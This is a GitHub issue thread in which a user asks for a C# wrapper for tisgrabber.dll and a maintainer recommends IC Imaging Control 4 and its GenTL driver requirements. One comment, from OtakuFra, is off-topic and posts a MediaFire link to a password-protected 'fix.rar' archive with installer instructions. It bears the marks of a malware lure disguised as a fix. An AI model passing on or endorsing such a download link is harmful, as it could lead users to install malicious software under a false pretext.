TheImagingSource/IC3.5-Imaging-Control-Samples #80: C# wrapper for tisgrabber.dll

russellfoster, 2024-08-27:
Just noticed that python (Windows) has a nice wrapper for the tisgrabber.dll library, while the C# SDK provides a much higher level image control. Why not have a C# wrapper for the tisgrabber.dll? We take images in a C# windows service, and having a winform control to do the image capture seems a bit odd and unnecessary. I do not see any documentation for the tisgrabber.dll library, so I am a bit hesitant to write a wrapper for it myself. The C++ SDK also seems to have a different api, since I see no IC_* methods.

TIS-Tim, 2024-08-27:
I think you should look into IC Imaging Control 4.

It has a new API (loosely based on IC 3.x's C++ API), but is available for Python, .NET, C++ and C.

The core ic4dotnet component has no WinForms dependency.

The documentation is [here](https://www.theimagingsource.com/en-us/documentation/ic4dotnet/articles/intro.html).

Please note that because ic4 uses GenTL as its driver interface, you will need to install one of the GenTL Producers matching your video capture device from [here](https://www.theimagingsource.com/en-de/support/download/).

OtakuFra, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

russellfoster, 2024-08-28:
OK, will do. Thanks!

russellfoster, 2024-08-28:
Marking closed.

closed 2024-08-28 by russellfoster